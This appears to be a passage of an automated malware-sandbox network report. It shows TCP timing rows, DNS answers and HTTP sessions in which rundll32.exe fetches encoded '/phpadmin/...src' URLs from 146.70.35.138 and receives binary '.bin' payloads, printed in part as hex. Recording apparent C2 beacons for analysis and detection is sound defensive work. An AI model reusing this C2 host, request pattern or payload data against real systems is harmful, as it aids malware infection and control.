                                    Apr 22, 2022 15:27:19.464536905 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.464545965 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.464555025 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.464689970 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.464783907 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465156078 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465188026 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465213060 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465231895 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465264082 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465272903 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465302944 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465325117 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465332985 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465348005 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465363979 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465385914 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465415001 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465428114 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465502024 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465527058 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465543032 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465562105 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465567112 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465590954 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465611935 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465614080 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465631008 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465639114 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465683937 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465698957 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465780973 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506732941 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506783009 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506808043 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506824970 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506849051 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506870985 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506870985 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506894112 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506911039 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506922007 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506933928 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506956100 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506958961 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506979942 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506988049 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506995916 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507019043 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507040977 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507046938 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.507064104 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507080078 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507090092 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.507100105 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507119894 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.507405996 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.716505051 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.741142035 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:20.120021105 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:20.120052099 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:20.120165110 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:28:21.255120993 CEST4977580192.168.2.7146.70.35.138

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Apr 22, 2022 15:26:57.316037893 CEST8.8.8.8192.168.2.70x9880No error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)
                                    Apr 22, 2022 15:26:57.330679893 CEST8.8.8.8192.168.2.70x6bd2No error (0)a-0019.a-msedge.neta-0019.a.dns.azurefd.netCNAME (Canonical name)IN (0x0001)
                                    Apr 22, 2022 15:26:57.330679893 CEST8.8.8.8192.168.2.70x6bd2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                    Apr 22, 2022 15:26:57.330679893 CEST8.8.8.8192.168.2.70x6bd2No error (0)a-0019.standard.a-msedge.net204.79.197.222A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • 146.70.35.138

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.749775146.70.35.13880C:\Windows\SysWOW64\rundll32.exe
                                    TimestampkBytes transferredDirectionData
                                    Apr 22, 2022 15:27:17.806870937 CEST1052OUTGET /phpadmin/amEwUCMy/zQvTSnELMCHIJfWA9A7NF2J/B_2FgTN3w5/bDUz7M_2FQ_2FvsyQ/_2FoZnlV0ztm/G4pVInXE2v2/3DjsF_2BN_2F7_/2FqxWA7q0ZWwUgJ9q_2B6/oG7o48SwKb_2FuN4/koQCfS1rrGeWSn9/gvwn1WY7oRq54G3QzL/QoP8Nx_2F/m8EC_2FPKp_2B2QIRT4a/hKoi_2FT5FiIh7mNlS7/jciRuxpI3KdaM19hmR8F9V/NOK7C_2BauAdB/emv_2BixRfY4926/zZ.src HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                    Host: 146.70.35.138
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Apr 22, 2022 15:27:18.182925940 CEST1053INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Fri, 22 Apr 2022 13:27:18 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 185492
                                    Connection: keep-alive
                                    Pragma: public
                                    Accept-Ranges: bytes
                                    Expires: 0
                                    Cache-Control: must-revalidate, post-check=0, pre-check=0
                                    Content-Disposition: inline; filename="6262ad36246e4.bin"
                                    Data Raw: 2c d4 68 ba 77 fa c2 de fe 95 8f 63 f1 45 56 5f 12 44 e4 30 5c f8 d2 eb ea 34 2c 15 08 e7 49 45 b8 f9 96 19 41 71 13 28 e7 22 8f 4d ba 44 b3 a3 6f 7b bf 72 ac b8 4f 7a 8f 60 a9 cb 6c 3d ef 2b e9 4b 6b 0d c8 68 41 c2 6d c2 e3 f9 cf c2 87 b7 ba 24 d1 5f c4 e4 11 7f 1c c7 6e f2 5e f5 c4 ad f7 ba 0b 19 f0 08 a6 0c 8c d6 7a ca 0e d2 e6 b9 3c 29 08 fd f9 f1 34 77 36 0b 69 d0 eb 4a 15 78 00 41 ee 63 8f 39 c4 83 84 54 5b 93 be 4b 41 ed 1d 77 6d c3 05 cd fb 5a 9e 69 00 27 b2 f8 28 22 b7 a6 fc e9 96 12 bf 16 16 9d 0b ee d7 ea 0d 29 ee 79 d6 f3 cc 9f 0b f5 7d b6 d6 9d bb 69 9e 76 c7 39 32 ee d6 d4 08 12 34 be c8 8e fb 1c 3d 89 fc bf 1e 9e 0e d2 b9 e2 14 bf 51 43 7d 58 21 d1 40 02 45 f3 45 af bc 93 a8 36 96 14 02 27 44 48 1d 0b 1f 08 60 72 20 55 8d 5f 3f 8c 71 71 8c e7 54 2b e2 cf f6 8d 2a df b4 82 9c 87 a5 18 0b 6f fb 3f 82 4c 5e aa 5a 08 af 9c 02 00 fb eb 9d d7 2f 90 11 fd 78 12 69 5c e2 38 4c 8c 6d 27 2d 35 3c 88 16 b7 9f 54 8f a5 4e e1 4b ea ff cb 25 a4 42 ea d4 1e 22 32 a7 6b d6 eb b7 2b c0 80 ad 13 44 6c 89 82 1e 7b 2c b0 71 05 65 75 d4 16 90 f9 f6 9e bf 21 86 69 02 07 a7 b5 02 b3 ec 6e 19 59 91 77 0a cd c7 f9 cf d0 06 50 8f db ab 03 f0 2b ed 2c e9 89 4a 88 59 8e 9c 7b de 14 fb 5f 7a df 0b 56 a9 b0 09 ba 19 86 1e 08 0f 71 f0 8e 65 83 4b a6 05 af 86 29 8c 39 c9 e2 36 a1 a4 0b 31 39 3a ee 98 85 08 ef f9 8a c4 bb ec bb 1f 9b 9f f4 c6 01 ad 17 12 ae cc 8a 29 41 89 52 e5 85 3e 09 15 69 93 24 9e f2 0d ae 0e 90 3c 47 2b 74 cd 39 1f dc 18 32 2f e0 00 8c d0 28 0e 13 d1 70 db 15 39 da 20 14 8b e0 b8 1b 3c 02 e0 b2 a5 3c ca fe e7 fb 71 b2 bc 46 2d bc b4 9e 2c 4d 42 51 60 d9 48 e0 73 ba b2 e6 ff cc b8 db 2e e2 47 db bb 09 3a b9 9f 21 fe 77 2e 1d b2 85 0d a1 6a 4b 3e 56 67 a8 28 25 b1 f2 cf ad c9 e6 f4 18 51 6f b6 b0 8a 87 9d fb ce 15 d9 a2 86 b4 13 c6 dd e0 49 26 f1 50 24 7d 04 14 ea d1 2d 24 e9 a6 f4 22 05 98 d9 91 38 e1 02 fb 62 5c 43 30 a0 74 a0 fe 8a 61 5b a4 5f 98 c5 39 06 b3 ff b3 25 3e 04 88 b4 82 83 94 64 a9 84 cb 9f 9f 1f 70 bf a6 3d 99 30 75 a2 26 ad af ef f7 ba 7e 13 36 dd ec 5b 00 93 21 74 eb 71 3e 31 3f 16 27 12 09 56 f4 b7 72 7d 36 19 03 2a 7c a9 f7 0e db 60 ea 21 0c ac 34 69 0b f0 81 dc 2d 5f e4 a4 b6 24 55 e6 24 ff de 1c d5 e9 18 d3 35 2a 51 65 b0 c5 0f d5 01 1b 9a a0 5e 93 f9 68 c7 00 64 1f 2c 80 f7 41 5f e5 a0 9d 2f c6 86 8f 6f 8b 9d 4c b1 75 fc 20 25 d0 69 a5 8d 42 8d 70 8d 86 c2 f3 67 47 48 b7 50 67 56 93 04 87 a8 94 6f b6 e3 87 a3 b4 4d 82 29 55 55 cc bf 88 0f b6 e6 4e 07 85 85 7b fd 4d fd 55 f7 b8 74 b1 8b 37 53 df fb 4f 98 6d 65 18 3a 85 dd 02 aa 7b f8 75 8a 02 bd 0a 6a 66 4a 19 f0 33 ea 01 93 bf 2a 36 65 f8 7e ef 26 c4 af a9 2e 18 c8 ed b3 86 8f 46 e9 a7 e4 ec 13 e5 6d 9b c1 09 49 cc 98 5f b5 0a 69 9d 1c e3 cc c3 38 81 ac 51 37 ad b2 6c 2f 7d 59 19 40 d7 7e f1 53 45 02 45 53 44 6c 2d 0d c7 9a 76 0c 41 e9 e0 e3 e8 77 65 0c 72 10 fe 62 87 ff 9f c1 11 34 4f a6 32 7d 9d 57 30 b5 40 b5 bb f8 5b 1b 7b 6f 92 b8 55 ce df 06 0e ce dd 7e ac 10 7e fd 5b dd 43 a7 d8 02 48 aa 68 37 27 8b 94 13 39 6a 48 27 0b 97 37 5f 35 45 41 33 2d 34 0a
                                    Data Ascii: ,hwcEV_D0\4,IEAq("MDo{rOz`l=+KkhAm$_n^z<)4w6iJxAc9T[KAwmZi'(")y}iv924=QC}X!@EE6'DH`r U_?qqT+*o?L^Z/xi\8Lm'-5<TNK%B"2k+Dl{,qeu!inYwP+,JY{_zVqeK)9619:)AR>i$<G+t92/(p9 <<qF-,MBQ`Hs.G:!w.jK>Vg(%QoI&P$}-$"8b\C0ta[_9%>dp=0u&~6[!tq>1?'Vr}6*|`!4i-_$U$5*Qe^hd,A_/oLu %iBpgGHPgVoM)UUN{MUt7SOme:{ujfJ3*6e~&.FmI_i8Q7l/}Y@~SEESDl-vAwerb4O2}W0@[{oU~~[CHh7'9jH'7_5EA3-4
                                    Apr 22, 2022 15:27:18.182971954 CEST1055INData Raw: 99 10 85 d7 1c 36 c0 22 ad c0 17 04 e7 d3 51 71 d3 71 24 6b 45 10 29 ad 03 0b 02 01 45 c4 ab 56 6a f7 03 ce 9d fc 36 9f 85 a2 31 5f 0d d6 6f 5a ec 99 18 9c 24 ce 53 b8 da 14 8e 41 1d 91 bf 2c c5 fb 1a 56 3b 1b 0b f1 9f c1 36 cc 1b a4 06 c6 7a 6b
                                    Data Ascii: 6"Qqq$kE)EVj61_oZ$SA,V;6zkv,O`~b.`3And/HH6/4l-#q*&inEf-Yx[?@8efjUr=e^>kVVG)Hz#shtEsl)
                                    Apr 22, 2022 15:27:18.183068037 CEST1056INData Raw: 1b c9 fe f8 47 fb 52 9b 80 32 24 7b 2d 18 cb 6c 0a 3a b7 e1 ff 5f 83 97 96 a5 35 d8 f7 5e a7 79 ea b3 a1 2f 09 24 81 c3 1b 1e 99 b1 3b 2d 0f 09 98 85 62 dd 7f f9 f9 70 57 67 9d 78 9f f9 ac 13 77 74 cc 43 fd 65 c1 c6 c1 56 79 23 b7 4a 81 e1 41 d0
                                    Data Ascii: GR2${-l:_5^y/$;-bpWgxwtCeVy#JA Vx|R+n+eN(S;4)s.GP`!DCNN>?R$3P$zVfw;}6@|)qW'a]Wx~$=c
                                    Apr 22, 2022 15:27:18.183115005 CEST1058INData Raw: 9d 8c 0f 29 e5 7d 63 0a 47 79 84 ab f5 f0 d6 c4 2e 40 df eb 8c e8 d1 cd 25 f4 39 de 92 3c 2e c3 ba 68 fb aa db 11 cc 83 9a cc 82 f3 08 e6 66 80 66 f6 92 6b 98 98 ad d8 b4 9f c9 bd 34 3e 60 b8 ae 98 a9 a3 db 3d 17 5b 68 03 62 38 59 22 16 59 3c 73
                                    Data Ascii: )}cGy.@%9<.hffk4>`=[hb8Y"Y<s0)e:W*kP;e1tPuL76a7I=%?r|QMoEr9_#sm>s_\C_zz8#-"C<1qQi!x[nYUz]X&\f
                                    Apr 22, 2022 15:27:18.183307886 CEST1059INData Raw: a3 98 5a d2 94 4f 6f 88 7b 3c 06 aa e1 bd 17 09 5d 19 3f 04 53 48 0f f7 44 12 25 75 27 c2 60 11 1d cb 77 fe 3e cd 5d 0a 26 c8 d5 c3 87 9b 28 54 56 36 1e a0 92 76 90 8c 6b d0 50 44 e9 fc b5 0a e2 60 71 ae ab 48 1e 82 82 1e 8f 7d 9f c4 96 12 46 39
                                    Data Ascii: ZOo{<]?SHD%u'`w>]&(TV6vkPD`qH}F9WZCk(`:_,n=D(p[0%r)4"F1@(WtDZn'M'#Azl|47r|)u5DPfh|*{9Plu1XX
                                    Apr 22, 2022 15:27:18.183341026 CEST1060INData Raw: 0c 0f 24 67 57 7e 5f 76 36 98 51 a8 14 f1 c9 e3 f7 a2 6e 23 41 07 5a 7f ee 5a 4e ec 41 10 0f 56 8a 7c 52 fb f9 73 55 03 0f 28 5d 2e 32 56 5b 25 f5 6e 70 c1 25 e2 eb 80 be 71 11 d0 72 3f 5b 0a ec a8 57 df 2f ac 65 51 5f 86 d8 41 af 08 88 c3 92 1d
                                    Data Ascii: $gW~_v6Qn#AZZNAV|RsU(].2V[%np%qr?[W/eQ_A[C4Rhr3~4!zc)CQp:iLHIJC9gqM`d$!V@?!^#u9e=KrldHQ,=C~vB.W
                                    Apr 22, 2022 15:27:18.183398962 CEST1061INData Raw: db 8f 61 c6 68 2b d1 8f 14 b3 9c c8 2c 73 0d 84 d3 ad 26 b4 a9 38 97 60 49 96 1f 0a 6b 6f ec 37 71 04 a4 ed 9b e2 ed 27 0d f6 c8 90 4d f2 d9 7d 92 df 49 1c 78 b6 95 04 24 d0 9e 5d 89 27 7f 93 1e 2b 16 4b 2e 88 3a 65 06 1d 51 f3 bc 5c b5 61 03 88
                                    Data Ascii: ah+,s&8`Iko7q'M}Ix$]'+K.:eQ\aw,4^?9h#JXfM{Lgn B=:\pcE,i(>N0qLK5%+Dn
                                    Apr 22, 2022 15:27:18.183427095 CEST1062INData Raw: c1 28 85 31 f3 e1 73 9c 9e d0 04 f5 ed df e1 15 18 99 44 0c 31 0f 94 33 d9 32 76 af 1d ea 2f 2e 2d 77 ee 3e 7f b7 d2 ca db 60 7f d8 e2 fe 39 18 e5 97 4b 19 e5 55 80 df 3d c8 48 07 91 dc ef d5 77 15 09 39 ec d3 32 df 1c 08 1a df 7b 16 63 4c 94 e5
                                    Data Ascii: (1sD132v/.-w>`9KU=Hw92{cL>QAC=@RSHpF#L:X?RnP>n"&&)*oj#AK-JF.@5s^%J{x{a5V/9M'\$VZVrqyQJF=B
                                    Apr 22, 2022 15:27:18.183490992 CEST1064INData Raw: 44 e9 18 ea 7b 09 e7 58 08 9c fc 1e e2 bb f8 30 f8 2d 24 ac 23 09 1a 0c a6 38 57 3a d8 56 a7 97 59 63 15 42 f5 24 06 bf eb d3 1c 55 64 92 cb 46 9f a7 8b e5 5e 04 05 11 bd ce 31 38 12 57 3f 15 bb f4 50 69 c8 81 fd f1 13 21 10 35 9d dd 16 5d 95 9f
                                    Data Ascii: D{X0-$#8W:VYcB$UdF^18W?Pi!5]?X{z!l7Z%k#Z/"F_vYo@F4G=[@d1)*>D9c[dkZuFmGCwYXm^KwI]k8bMZi~]I.#)`Vo
                                    Apr 22, 2022 15:27:18.183581114 CEST1065INData Raw: 5a c8 01 09 71 76 cb b3 67 70 a5 0c 32 1a a1 f1 21 e4 69 c4 52 db 83 0d 93 8e 49 98 ab 8d 8f b2 86 83 11 b1 98 fb 07 5c 61 6a eb 8c b1 20 61 c2 6e 93 cb 44 dd 81 b7 90 aa 0f 55 02 2e db 92 5c 8a b4 9c a5 2c af 59 14 d5 15 a1 70 f4 e8 e5 98 1b 2e
                                    Data Ascii: Zqvgp2!iRI\aj anDU.\,Yp.4LG)aZJJx,A2[tRvZE /w;P Y~PHN!yeD7_5km91>Ufybo.`}:lR?Y]$C3'8[pzf{KE&r
                                    Apr 22, 2022 15:27:18.207326889 CEST1065INData Raw: e8 c6 a7 a0 26 25 e0 be ef 5e a1 4f f7 db ac b4 1b 26 39 5f 84 57 e3 f7 a0 55 c7 03 19 8c e4 e2 3d c6 d7 aa 7d d3 1a 65 03 c8 42 32 83 d1 08 26 52 07 c0 f2 4b fb e1 b2 99 21 c5 81 c2 cb 2e 72 47 ae 03 6e 1d 86 75 f2 7b 40 67 ec af db df 71 4e 16
                                    Data Ascii: &%^O&9_WU=}eB2&RK!.rGnu{@gqN
                                    Apr 22, 2022 15:27:18.629539967 CEST1252OUTGET /phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                    Host: 146.70.35.138
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Apr 22, 2022 15:27:19.009407043 CEST1254INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Fri, 22 Apr 2022 13:27:18 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 237210
                                    Connection: keep-alive
                                    Pragma: public
                                    Accept-Ranges: bytes
                                    Expires: 0
                                    Cache-Control: must-revalidate, post-check=0, pre-check=0
                                    Content-Disposition: inline; filename="6262ad36edbb0.bin"
                                    Data Raw: c5 94 a1 d4 cf 01 54 ad 67 b8 35 ce fb a5 32 f4 b8 b7 20 18 bc af a0 b9 ec 7b fb 86 8b 40 5e 0c 4a 06 ae 62 ba 7e a8 0e 1b 4e 14 4a 61 22 66 60 c1 90 c2 5a 82 32 07 b5 0a 28 8e 7e ea 85 17 e2 57 83 3e 40 70 7a c8 68 8c 7d d1 83 2a 85 e7 64 0d ab 77 92 0b f8 d4 ae aa 6d 4c 70 33 cb 56 58 74 22 20 f5 7b 99 7b 0e 65 8e 51 07 ac ce 98 00 ec e4 f0 89 47 50 b4 65 b8 e6 23 43 ea 16 0d b5 8e 48 c9 d4 b9 c9 0f 48 2b 92 f5 d9 19 96 9f b7 32 8f 57 f8 3a 9c fc 78 1d 08 05 6b ca 6b 56 e1 08 8a 76 14 44 72 99 2e 7d 22 b0 6c 29 5b 8c 06 be c3 af d8 ef ff 64 73 b5 62 45 13 3e b1 99 c6 c3 60 ae 9b 3e dd 20 19 6a a3 cd 7a 59 d5 b4 c1 aa a6 dc 4b 26 e5 4e 0a ac 02 9b 15 7a 9d 51 f7 1e e8 c4 41 6e b0 8e ff d2 ab 95 a3 8f 5b f5 e4 4b 8d 05 c5 21 c3 0d 04 92 f1 83 5d d6 cd 19 d6 95 ef 7a 20 dc 91 10 4b 51 4d c4 2f 7e 03 c5 fb c7 08 d6 e6 74 2d 56 44 d8 a7 57 e5 91 1a 81 81 28 8e 88 63 7a 12 47 80 4d 99 4c 72 45 22 50 02 d6 85 c2 6c fd db 8c 27 af ef 7c 2f 5d 7c 0b e5 88 33 be dd 60 30 74 74 8c a3 06 b9 ed d1 2c 46 b0 e9 a1 97 b3 ea 80 a0 99 6b 07 3c 37 c9 12 1f ca d9 c3 f6 bb 95 dd 15 23 53 41 27 6f f3 b7 88 01 8a d4 d8 80 fd 64 fa 32 a6 51 db 9f c7 ee e4 2d 78 68 27 22 5a e0 e3 ba 67 38 ba 44 d8 c0 55 c4 ec 9a 89 db f1 e0 2e d2 f7 a6 dc 66 3e 69 cc e8 de eb f3 85 39 5d 45 7f b9 f1 d9 92 47 72 e8 1c dc 16 5f 94 8a 34 c6 6c c7 7f bf 51 e6 91 79 6b ec b5 f2 72 8a 6e b3 d4 29 d2 4a 3d 65 71 97 ed a8 79 9f fb cb 30 cc fd 81 1c 66 39 8a b5 b5 5f 2c dd e5 5b 58 45 3b 5a 92 5c 70 43 7f 69 e1 9b 6d 7f db ab 8b d9 4b ae 21 5f 89 c8 75 0c 23 18 67 b6 b0 86 9b cc 76 18 15 a9 b3 09 79 d9 aa 99 d5 8b c9 51 00 53 c1 31 2b cd 41 d0 8a 96 d9 92 f2 7f 67 79 25 7f e2 62 ad 75 e8 be a6 7a 01 eb 0c f3 5a 4c 9f 68 d1 7f e9 9e 7f 08 a9 1c 84 4b b7 f0 66 31 a6 2b 57 22 e5 0e 43 be b8 fc 02 48 c9 d3 b8 1c e9 cc 51 f3 27 a8 b6 0c 56 89 f3 0e 39 c0 70 63 51 a6 e5 fc 29 3c a8 0f ec 59 d0 f4 34 c5 27 e7 61 7b 18 d0 12 e9 ab 44 40 e0 f6 7f 5e 83 98 d8 bc 67 ce ce 0f e5 1f 97 a0 21 8a 8e bc 55 43 ed 76 28 e5 0b 47 e0 f3 ff d0 21 b2 bc 73 a8 04 22 a6 ff 80 9f 8f 27 4d 47 a6 c6 82 70 1a 05 2d e6 88 42 ba 6d eb 81 16 9c c2 93 e2 65 77 90 f6 1e fa 29 11 df 98 6b fa 90 d3 03 e2 3a e4 ea 7c 50 f4 57 34 74 0a ea 2a 2c c1 b6 1b 90 45 b5 a5 5d c8 a3 e5 2d c5 1b 47 36 e5 5e 5c ff 60 5b 86 7b 3a 3b 37 57 9d 83 86 72 e8 ac ff 51 7d 5b 56 f9 58 9b fc bd c3 ae 7f 17 f4 86 5d ac bf 83 30 cc a8 ac 1b 10 85 b4 67 38 3f 05 02 4b 10 c3 bc 6d cc 98 fe aa 9d fd 82 48 09 5f 6d c5 24 98 bc 1e 8d d0 32 3a be ba 5b cc 59 71 10 19 db f1 27 b4 18 19 51 81 c9 dc 2a 68 da d5 ca 34 87 4e 78 63 94 78 3a e6 ce 53 d9 88 10 f3 a7 80 63 78 a7 38 76 d7 18 61 67 78 00 29 51 09 8f 4c 89 4b ca 92 9c 13 7e 59 39 a0 51 aa fa d1 03 3b 4a 5f 67 d0 85 63 ea 30 6f 0d e8 09 ae 34 e7 8a 90 d9 95 4b fd 26 05 fb 0e 7c 02 b0 0c f9 67 df 98 0f 79 8c 6d ff 0c e7 be 6a b7 12 29 4d 0b 62 99 8f 98 67 62 02 8d b2 49 94 fa b5 be b0 ec 6a 9a af d8 30 7c aa 3f 85 d3 66 54 02 99 b6 98 bd be ce 73 8d 03 3f fe 89 4f 99 33 c1 d3 c5 bf fa 8b fb
                                    Data Ascii: Tg52 {@^Jb~NJa"f`Z2(~W>@pzh}*dwmLp3VXt" {{eQGPe#CHH+2W:xkkVvDr.}"l)[dsbE>`> jzYK&NzQAn[K!]z KQM/~t-VDW(czGMLrE"Pl'|/]|3`0tt,Fk<7#SA'od2Q-xh'"Zg8DU.f>i9]EGr_4lQykrn)J=eqy0f9_,[XE;Z\pCimK!_u#gvyQS1+Agy%buzZLhKf1+W"CHQ'V9pcQ)<Y4'a{D@^g!UCv(G!s"'MGp-Bmew)k:|PW4t*,E]-G6^\`[{:;7WrQ}[VX]0g8?KmH_m$2:[Yq'Q*h4Nxcx:Scx8vagx)QLK~Y9Q;J_gc0o4K&|gymj)MbgbIj0|?fTs?O3
                                    Apr 22, 2022 15:27:19.716505051 CEST1509OUTGET /phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                    Host: 146.70.35.138
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Apr 22, 2022 15:27:20.120021105 CEST1510INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Fri, 22 Apr 2022 13:27:20 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 1869
                                    Connection: keep-alive
                                    Pragma: public
                                    Accept-Ranges: bytes
                                    Expires: 0
                                    Cache-Control: must-revalidate, post-check=0, pre-check=0
                                    Content-Disposition: inline; filename="6262ad3811867.bin"
                                    Data Raw: 40 d1 e5 5a 8b c7 b4 20 04 1d ee a2 24 f1 96 9d 26 a1 0b 1b 7e e3 4e 1f 5d 3c 4d da 10 7c 95 81 0f 16 f7 ee 7d fb 39 8c 70 71 45 d9 0f ab ad 60 01 a5 32 5d be 0d 61 0e 50 82 f8 65 5b 9a 22 17 77 7e df 1d d3 e9 2a 08 c4 85 a2 d9 7c 2f 82 76 1f a1 0c 49 88 f8 0e c9 2d a0 8a 50 56 c2 c7 92 94 e2 ec 7e 79 4a 65 9b 26 e4 dd 72 cc a9 e7 63 18 5b ca dd df b9 3c ff 59 43 c8 9c c3 1a 12 d9 00 09 54 eb 65 b3 47 f4 68 0c b2 8f b5 20 fb 61 ad f0 29 d6 ef 6f ad 1f 9b 0f 56 f2 39 7e b4 2e 17 15 94 17 47 de 21 36 e1 25 3a 1c 1e 8d 36 93 c2 c8 4e 60 10 93 49 cd cf 19 4f 0c 1f a5 d3 5d df 25 13 ca 40 20 64 fe 4b 27 eb fb 5b ce 56 73 77 b6 d4 6f 61 c2 6b 4e fe cb 73 77 22 e9 f6 1d 48 0c 2e 7a d7 73 4c e6 51 80 cb f5 e3 20 5b 24 a3 68 83 38 6a 87 1d d6 fc d3 cf f2 a2 a3 35 f3 19 e8 ac 2c e4 cb 70 a5 b0 92 e2 87 00 7b 31 2a 0d 22 de b4 1e 6d 5d 7c 13 90 ef 11 74 34 aa 7e 6b 92 3a e5 d5 5c be 59 0b ec ab 8a db cf 67 a8 2b 63 24 50 a1 20 ed 30 f3 e8 e0 28 6b 51 f4 5e e9 